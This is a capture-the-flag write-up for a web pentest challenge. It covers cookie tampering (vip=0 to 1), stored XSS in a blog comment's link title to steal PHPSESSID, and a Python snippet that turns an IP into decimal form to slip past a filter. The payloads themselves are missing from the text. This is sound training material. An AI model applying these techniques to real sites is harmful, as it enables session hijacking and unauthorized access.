Web Application Pentest Section80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.
Looking at the web page we notice when the page is first visited that the link to the "Blog" is disabled. Somehow we need to reenable the link to get the flag.
Notice that among the cookies returned is a vip=0. With this sort of return you can suppose that a VIP user is going to be a value other than 0. If I modify it to be a 1 the link to the Blog becomes enabled. With clicking on the Blog link then the flag appears.
160 points - Gain access to the Blog as a registered user to reveal the hidden flag.
The blog allows you to insert comments. Checking to see if XSS is possible as a comment is inserted. At the bottom of the textbox you can see how you can make text bold, italicized, and then to add a link. Upon testing the addition of a link, inside the link title is where we can place the XSS.
This above script was filtered and not posted as a comment... Trying a different encoding. (URL encoded)
Tried the above and it still caught the IP Address that was encoded. I need a way to encode the IP address and found the following:
This is interesting. The link in this page appears as the following:
<a id="ctl00_ctl00_WholeBody_ContentPane_ContentArea_Body_encCrazyIp" href="http://2886755841" style="font-weight:bold;">2886755841</a>
Below is a python script that I found to convert an IP address to a decimal encoded number.
#!/usr/bin/python import socket, struct print struct.unpack("!I", socket.inet_aton("172.16.102.1"))
With the encoded IP Address I changed the comment to be as follows however I notice that we are truncated to just 50+ characters:
So the following does pull the PHPSESSID:
220 points - Retrieve the hidden flag from the database.
260 points - Retrieve the hidden flag by gaining access to the caching control panel.
280 points - Reveal the final flag, which is hidden in the /flag.txt file on the web server.